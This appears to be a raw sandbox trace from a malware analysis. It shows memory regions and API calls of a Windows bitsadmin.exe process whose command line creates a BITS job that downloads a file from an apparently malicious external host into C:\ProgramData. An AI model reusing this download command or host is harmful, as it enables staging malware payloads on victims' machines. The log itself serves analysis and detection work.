os_parent_pid = "0xa98"
cmd_line = "\"C:\\Windows\\System32\\bitsadmin.exe\" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/r1.log C:\\ProgramData\\tempa\\r1.log"
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1836
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1837
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1838
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 1839
start_va = 0x130000
end_va = 0x16ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000130000"
filename = ""
Region:
id = 1840
start_va = 0xa80000
end_va = 0xac3fff
entry_point = 0xa80000
region_type = mapped_file
name = "bitsadmin.exe"
filename = "\\Windows\\System32\\bitsadmin.exe" (normalized: "c:\\windows\\system32\\bitsadmin.exe")
Region:
id = 1841
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1842
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1843
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 1844
start_va = 0x7ffdc000
end_va = 0x7ffdcfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdc000"
filename = ""
Region:
id = 1845
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 1846
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1847
start_va = 0x20000
end_va = 0x2ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1848
start_va = 0x50000
end_va = 0xb6fff
entry_point = 0x50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1849
start_va = 0x1e0000
end_va = 0x1effff
entry_point = 0x0
region_type = private
name = "private_0x00000000001e0000"
filename = ""
Region:
id = 1850
start_va = 0x200000
end_va = 0x2fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 1851
start_va = 0x300000
end_va = 0x3c7fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000300000"
filename = ""
Region:
id = 1852
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 1853
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1854
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1855
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 1856
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1857
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1858
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1859
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1860
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 1861
start_va = 0x75c70000
end_va = 0x768b9fff
entry_point = 0x75c70000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 1862
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1863
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1864
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1865
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1866
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 1867
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1868
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1869
start_va = 0xc0000
end_va = 0xc6fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000c0000"
filename = ""
Region:
id = 1870
start_va = 0xd0000
end_va = 0xd1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 1871
start_va = 0xe0000
end_va = 0xe0fff
entry_point = 0xe0000
region_type = mapped_file
name = "bitsadmin.exe.mui"
filename = "\\Windows\\System32\\en-US\\bitsadmin.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\bitsadmin.exe.mui")
Region:
id = 1872
start_va = 0xf0000
end_va = 0xf0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 1873
start_va = 0x100000
end_va = 0x100fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000100000"
filename = ""
Region:
id = 1874
start_va = 0x3d0000
end_va = 0x4d0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003d0000"
filename = ""
Region:
id = 1875
start_va = 0xad0000
end_va = 0x16cffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000ad0000"
filename = ""
Region:
id = 1876
start_va = 0x170000
end_va = 0x1cbfff
entry_point = 0x170000
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1877
start_va = 0x170000
end_va = 0x1cbfff
entry_point = 0x170000
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1878
start_va = 0x74fc0000
end_va = 0x74fcbfff
entry_point = 0x74fc0000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1879
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 1880
start_va = 0x4e0000
end_va = 0x67ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000004e0000"
filename = ""
Region:
id = 1881
start_va = 0x4e0000
end_va = 0x5befff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004e0000"
filename = ""
Region:
id = 1882
start_va = 0x640000
end_va = 0x67ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000640000"
filename = ""
Region:
id = 1883
start_va = 0x110000
end_va = 0x110fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000110000"
filename = ""
Region:
id = 1884
start_va = 0x770c0000
end_va = 0x77142fff
entry_point = 0x770c0000
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1885
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1886
start_va = 0x120000
end_va = 0x120fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000120000"
filename = ""
Region:
id = 1887
start_va = 0x750000
end_va = 0x78ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000750000"
filename = ""
Region:
id = 1888
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 1889
start_va = 0x6b0000
end_va = 0x6effff
entry_point = 0x0
region_type = private
name = "private_0x00000000006b0000"
filename = ""
Region:
id = 1890
start_va = 0x74b40000
end_va = 0x74b55fff
entry_point = 0x74b40000
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 1891
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 1892
start_va = 0x170000
end_va = 0x1abfff
entry_point = 0x170000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1893
start_va = 0x170000
end_va = 0x1abfff
entry_point = 0x170000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1894
start_va = 0x170000
end_va = 0x1abfff
entry_point = 0x170000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1895
start_va = 0x170000
end_va = 0x1abfff
entry_point = 0x170000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1896
start_va = 0x170000
end_va = 0x1abfff
entry_point = 0x170000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1897
start_va = 0x748e0000
end_va = 0x7491afff
entry_point = 0x748e0000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1898
start_va = 0x790000
end_va = 0xa5efff
entry_point = 0x790000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1899
start_va = 0x75060000
end_va = 0x7506dfff
entry_point = 0x75060000
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 1900
start_va = 0x700000
end_va = 0x73ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000700000"
filename = ""
Region:
id = 1901
start_va = 0x17a0000
end_va = 0x17dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000017a0000"
filename = ""
Region:
id = 1902
start_va = 0x7ffda000
end_va = 0x7ffdafff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffda000"
filename = ""
Region:
id = 1903
start_va = 0x7ffdb000
end_va = 0x7ffdbfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdb000"
filename = ""
Region:
id = 1904
start_va = 0x6f8b0000
end_va = 0x6f8b8fff
entry_point = 0x6f8b0000
region_type = mapped_file
name = "qmgrprxy.dll"
filename = "\\Windows\\System32\\qmgrprxy.dll" (normalized: "c:\\windows\\system32\\qmgrprxy.dll")
Thread:
id = 180
os_tid = 0xda8
[0075.510] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f7c4 | out: lpSystemTimeAsFileTime=0x16f7c4*(dwLowDateTime=0xdd9d6090, dwHighDateTime=0x1d469c7))
[0075.510] GetCurrentProcessId () returned 0xda4
[0075.510] GetCurrentThreadId () returned 0xda8
[0075.510] GetTickCount () returned 0x20c5e
[0075.510] QueryPerformanceCounter (in: lpPerformanceCount=0x16f7bc | out: lpPerformanceCount=0x16f7bc*=1814945600000) returned 1
[0075.511] GetModuleHandleA (lpModuleName=0x0) returned 0xa80000
[0075.511] __set_app_type (_Type=0x1)
[0075.511] __p__fmode () returned 0x757a31f4
[0075.511] __p__commode () returned 0x757a31fc
[0075.511] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xaa7f33) returned 0x0
[0075.511] __wgetmainargs (in: _Argc=0xac0824, _Argv=0xac082c, _Env=0xac0828, _DoWildCard=0, _StartInfo=0xac0838 | out: _Argc=0xac0824, _Argv=0xac082c, _Env=0xac0828) returned 0
[0075.512] _onexit (_Func=0xaa925e) returned 0xaa925e
[0075.512] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0075.512] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
[0075.512] AitLogFeatureUsageByApp () returned 0x0
[0075.512] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18
[0075.513] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b
[0075.513] VerifyVersionInfoW (in: lpVersionInformation=0x16f638, dwTypeMask=0x3, dwlConditionMask=0x1b | out: lpVersionInformation=0x16f638) returned 1
[0075.513] SetLastError (dwErrCode=0x0)
[0075.513] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0075.513] GetProcAddress (hModule=0x75370000, lpProcName="HeapSetInformation") returned 0x753c4157
[0075.513] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0075.513] GetCurrentProcess () returned 0xffffffff
[0075.513] GetCurrentThread () returned 0xfffffffe
[0075.513] GetCurrentProcess () returned 0xffffffff
[0075.513] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0xaac3b0, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0xaac3b0*=0x80) returned 1
[0075.513] SetConsoleCtrlHandler (HandlerRoutine=0xa974cb, Add=1) returned 1
[0075.513] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0075.513] GetProcAddress (hModule=0x75370000, lpProcName="SetThreadUILanguage") returned 0x753c24c2
[0075.513] SetThreadUILanguage (LangId=0x0) returned 0x409
[0075.514] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437"
[0075.514] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437"
[0075.514] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437"
[0075.515] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437"
[0075.515] _wcsicmp (_String1="/transfer", _String2="/RAWRETURN") returned 2
[0075.515] _wcsicmp (_String1="/transfer", _String2="/WRAP") returned -3
[0075.515] _wcsicmp (_String1="/transfer", _String2="/NOWRAP") returned 6
[0075.515] swprintf_s (in: _Dst=0x16f730, _SizeInWords=0x12, _Format="%u.%u.%u" | out: _Dst="7.5.7601") returned 8
[0075.516] GetFileType (hFile=0x7) returned 0x2
[0075.516] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f6a4 | out: lpMode=0x16f6a4) returned 1
[0075.516] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16f6d4, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16f6d4*=0x2) returned 1
[0075.516] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0x24, lpNumberOfCharsWritten=0x16f6e0, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16f6e0*=0x24) returned 1
[0075.516] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x16f6e4, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16f6e4*=0x1e) returned 1
[0075.516] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0x29, lpNumberOfCharsWritten=0x16f6e8, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16f6e8*=0x29) returned 1
[0075.517] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16f6ec, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16f6ec*=0x2) returned 1
[0075.517] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0x5e, lpNumberOfCharsWritten=0x16f6f0, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16f6f0*=0x5e) returned 1
[0075.517] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0x58, lpNumberOfCharsWritten=0x16f6f4, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16f6f4*=0x58) returned 1
[0075.517] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xab43c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16f6f8, lpReserved=0x0 | out: lpBuffer=0xab43c4*, lpNumberOfCharsWritten=0x16f6f8*=0x2) returned 1
[0075.517] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
[0075.528] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0075.528] GetNumberOfConsoleInputEvents (in: hConsoleInput=0x3, lpNumberOfEvents=0x16f744 | out: lpNumberOfEvents=0x16f744) returned 1
[0075.528] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0075.528] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0xaac3a8 | out: lpMode=0xaac3a8) returned 1
[0075.528] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xaac390 | out: lpConsoleScreenBufferInfo=0xaac390) returned 1
[0075.528] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0xaac38c | out: lpMode=0xaac38c) returned 1
[0075.528] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0075.529] _wcsicmp (_String1="/transfer", _String2="/HELP") returned 12
[0075.529] _wcsicmp (_String1="/transfer", _String2="/?") returned 53
[0075.529] _wcsicmp (_String1="/transfer", _String2="/UTIL") returned -1
[0075.529] _wcsicmp (_String1="/transfer", _String2="/LIST") returned 8
[0075.529] _wcsicmp (_String1="/transfer", _String2="/MONITOR") returned 7
[0075.529] _wcsicmp (_String1="/transfer", _String2="/RESET") returned 2
[0075.529] _wcsicmp (_String1="/transfer", _String2="/TRANSFER") returned 0
[0075.529] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x1) returned 1
[0075.529] _wcsicmp (_String1="/priority", _String2="/UPLOAD") returned -5
[0075.529] _wcsicmp (_String1="/priority", _String2="/DOWNLOAD") returned 12
[0075.529] _wcsicmp (_String1="/priority", _String2="/PRIORITY") returned 0
[0075.529] _wcsicmp (_String1="foreground", _String2="FOREGROUND") returned 0
[0075.529] CoCreateInstance (in: rclsid=0xa965d4*(Data1=0x4991d34b, Data2=0x80a1, Data3=0x4291, Data4=([0]=0x83, [1]=0xb6, [2]=0x33, [3]=0x28, [4]=0x36, [5]=0x6b, [6]=0x90, [7]=0x97)), pUnkOuter=0x0, dwClsContext=0x4, riid=0xa965b4*(Data1=0x5ce34c0d, Data2=0xdc9, Data3=0x4c1f, Data4=([0]=0x89, [1]=0x7c, [2]=0xda, [3]=0xa1, [4]=0xb7, [5]=0x8c, [6]=0xee, [7]=0x7c)), ppv=0xaac3b4 | out: ppv=0xaac3b4*=0x21a4dc) returned 0x0
[0075.566] IBackgroundCopyManager:CreateJob (in: This=0x21a4dc, DisplayName="msd5", Type=0x0, pJobId=0x16f70c, ppJob=0x16f708 | out: pJobId=0x16f70c*(Data1=0xfa52b55e, Data2=0x5c70, Data3=0x4010, Data4=([0]=0x8a, [1]=0x8e, [2]=0xab, [3]=0xd2, [4]=0xe7, [5]=0x4d, [6]=0x85, [7]=0xf9)), ppJob=0x16f708*=0x21a5b4) returned 0x0
[0075.572] CoTaskMemAlloc (cb=0x50) returned 0x230c28
[0075.572] IUnknown:AddRef (This=0x21a5b4) returned 0x2
[0075.572] IUnknown:AddRef (This=0x21a5b4) returned 0x3
[0075.572] PeekMessageW (in: lpMsg=0x16f684, hWnd=0x0, wMsgFilterMin=0x400, wMsgFilterMax=0x400, wRemoveMsg=0x0 | out: lpMsg=0x16f684) returned 0
[0075.572] IUnknown:Release (This=0x21a5b4) returned 0x2
[0075.572] IBackgroundCopyJob:SetPriority (This=0x21a5b4, Val=0x0) returned 0x0
[0075.576] IBackgroundCopyJob:AddFile (This=0x21a5b4, RemoteUrl="http://xbr6lge984320911.notafiscal05.com:25067/04/r1.log", LocalName="C:\\ProgramData\\tempa\\r1.log") returned 0x0
[0075.585] IBackgroundCopyJob:SetNotifyFlags (This=0x21a5b4, Val=0xb) returned 0x0
[0075.587] IBackgroundCopyJob:SetNotifyInterface (This=0x21a5b4, Val=0x230c28) returned 0x0
[0075.587] IUnknown:QueryInterface (in: This=0x230c28, riid=0x76a63e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x16f188 | out: ppvObject=0x16f188*=0x0) returned 0x80004002
[0075.587] IUnknown:QueryInterface (in: This=0x230c28, riid=0x76a63e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x16f148 | out: ppvObject=0x16f148*=0x0) returned 0x80004002
[0075.587] IUnknown:QueryInterface (in: This=0x230c28, riid=0x76a597c4*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x16f130 | out: ppvObject=0x16f130*=0x0) returned 0x80004002
[0075.587] IUnknown:QueryInterface (in: This=0x230c28, riid=0x76a69b0c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x16f0e4 | out: ppvObject=0x16f0e4*=0x230c28) returned 0x0
[0075.587] IUnknown:AddRef (This=0x230c28) returned 0x3
[0075.587] IUnknown:QueryInterface (in: This=0x230c28, riid=0x76a4c15c*(Data1=0x18, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x16f044 | out: ppvObject=0x16f044*=0x0) returned 0x80004002
[0075.587] IUnknown:QueryInterface (in: This=0x230c28, riid=0x76a4c0a8*(Data1=0x19, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x230d3c | out: ppvObject=0x230d3c*=0x0) returned 0x80004002
[0075.587] IUnknown:QueryInterface (in: This=0x230c28, riid=0x76a4c16c*(Data1=0x4c1e39e1, Data2=0xe3e3, Data3=0x4296, Data4=([0]=0xaa, [1]=0x86, [2]=0xec, [3]=0x93, [4]=0x8d, [5]=0x89, [6]=0x6e, [7]=0x92)), ppvObject=0x16f04c | out: ppvObject=0x16f04c*=0x0) returned 0x80004002
[0075.588] IUnknown:Release (This=0x230c28) returned 0x2
[0075.589] IUnknown:QueryInterface (in: This=0x230c28, riid=0x2218f0*(Data1=0x659cdeac, Data2=0x489e, Data3=0x11d9, Data4=([0]=0xa9, [1]=0xcd, [2]=0x0, [3]=0xd, [4]=0x56, [5]=0x96, [6]=0x52, [7]=0x51)), ppvObject=0x16e54c | out: ppvObject=0x16e54c*=0x0) returned 0x80004002
[0075.590] IUnknown:QueryInterface (in: This=0x230c28, riid=0x2218f0*(Data1=0x97ea99c7, Data2=0x186, Data3=0x4ad4, Data4=([0]=0x8d, [1]=0xf9, [2]=0xc5, [3]=0xb4, [4]=0xe0, [5]=0xed, [6]=0x6b, [7]=0x22)), ppvObject=0x16e54c | out: ppvObject=0x16e54c*=0x230c28) returned 0x0
[0075.590] IUnknown:QueryInterface (in: This=0x230c28, riid=0x2218f0*(Data1=0x97ea99c7, Data2=0x186, Data3=0x4ad4, Data4=([0]=0x8d, [1]=0xf9, [2]=0xc5, [3]=0xb4, [4]=0xe0, [5]=0xed, [6]=0x6b, [7]=0x22)), ppvObject=0x228278 | out: ppvObject=0x228278*=0x230c28) returned 0x0
[0075.592] IBackgroundCopyJob:Resume (This=0x21a5b4) returned 0x0
[0075.606] IUnknown:QueryInterface (in: This=0x230c28, riid=0x76a4c17c*(Data1=0x1c733a30, Data2=0x2a1c, Data3=0x11ce, Data4=([0]=0xad, [1]=0xe5, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x44, [6]=0x77, [7]=0x3d)), ppvObject=0x16ea9c | out: ppvObject=0x16ea9c*=0x0) returned 0x80004002
[0075.606] IBackgroundCopyCallback:JobModification (This=0x230c28, pJob=0x21a644, dwReserved=0x0) returned 0x0
[0075.606] IBackgroundCopyJob:GetState (in: This=0x21a5b4, pVal=0x230c34 | out: pVal=0x230c34) returned 0x0
[0075.608] IBackgroundCopyJob:GetType (in: This=0x21a5b4, pVal=0x16e608 | out: pVal=0x16e608) returned 0x0
[0075.609] IBackgroundCopyJob:GetProgress (in: This=0x21a5b4, pVal=0x230c38 | out: pVal=0x230c38) returned 0x0
[0075.610] IBackgroundCopyJob:GetPriority (in: This=0x21a5b4, pVal=0x16e604 | out: pVal=0x16e604) returned 0x0
[0075.610] CoTaskMemFree (pv=0x0)
[0075.610] IBackgroundCopyJob:GetDisplayName (in: This=0x21a5b4, pVal=0x16e61c | out: pVal=0x16e61c*="msd5") returned 0x0
[0075.611] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16e5c4 | out: lpConsoleScreenBufferInfo=0x16e5c4) returned 1
[0075.611] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x16e5dc | out: lpNumberOfCharsWritten=0x16e5dc) returned 1
